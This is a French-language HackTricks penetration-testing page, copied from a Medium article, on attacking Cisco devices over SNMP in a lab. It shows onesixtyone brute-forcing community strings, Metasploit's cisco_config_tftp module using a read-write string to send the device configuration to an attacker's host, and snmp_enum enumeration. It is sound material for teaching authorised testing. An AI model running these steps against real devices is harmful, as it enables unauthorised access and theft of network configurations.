hacktricks/network-services-pentesting/pentesting-snmp/cisco-snmp.md
2023-06-03 13:10:46 +00:00

6.8 KiB

Cisco SNMP

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Cette page a été copiée depuis https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Exfiltration de configuration et énumération via SNMP

SNMP (Simple Network Management Protocol) est un protocole qui vous permet de surveiller l'état des périphériques sur un réseau informatique. Il peut s'agir d'équipements réseau, de téléphones IP, de serveurs d'entreprise ou de tout autre élément.

SNMP utilise le protocole de couche de transport UDP avec les numéros de port 161/UDP et 162/UDP. Des chaînes de communauté sont utilisées pour faire référence aux agents SNMP sur le serveur. Ce sont, pour ainsi dire, des mots de passe spéciaux pour communiquer avec le serveur SNMP. Les chaînes de communauté ont des autorisations soit en lecture seule (RO), soit en lecture-écriture (RW).

En fait, SNMP peut non seulement surveiller l'état de l'équipement, mais aussi le gérer entièrement : extraire des configurations, modifier la configuration, etc. Si un testeur de pénétration peut rechercher la valeur des chaînes de communauté, il accède en fait à l'équipement. Cependant, tout dépend de la chaîne qu'il a bruteforcée - la chaîne de communauté RO ou RW.

La force brute des chaînes de communauté peut être mise en œuvre à l'aide de l'utilitaire onesixtyone. Il prendra en entrée le dictionnaire pour la force brute et les adresses IP des hôtes cibles. Les cibles seront :

  • 10.10.100.10 - Commutateur Cisco vIOS
  • 10.10.100.254 - Routeur Cisco vIOS
~$ onesixtyone -c communitystrings -i targets

Nous avons découvert quelles chaînes de communauté sont utilisées sur ces appareils. Cela ouvre la voie à l'exploitation.

8.1 cisco_config_tftp

Avec le framework Metasploit, notamment le module cisco_config_tftp, vous pouvez extraire la configuration de l'appareil en connaissant la valeur de la chaîne de communauté. La chaîne qui a les droits en lecture-écriture est private.

Nous aurons besoin des éléments suivants :

  • Chaîne de communauté en lecture-écriture (COMMUNITY)
  • Adresse IP de l'attaquant (LHOST)
  • Adresse IP de l'équipement cible (RHOSTS)
  • Le chemin dans lequel le module sort la configuration de l'appareil (OUTPUTDIR)
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit

Après avoir démarré le module, la configuration de l'hôte avec l'adresse 10.10.100.10 (10.10.100.10.txt) sera téléchargée dans le dossier spécifié.

8.2 snmp_enum

Avec ce module, vous pouvez découvrir des informations sur le matériel cible. Tout est exactement pareil : spécifiez COMMUNITY (d'ailleurs, même une chaîne avec des permissions RO fera l'affaire) et l'adresse IP de l'appareil cible.

msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥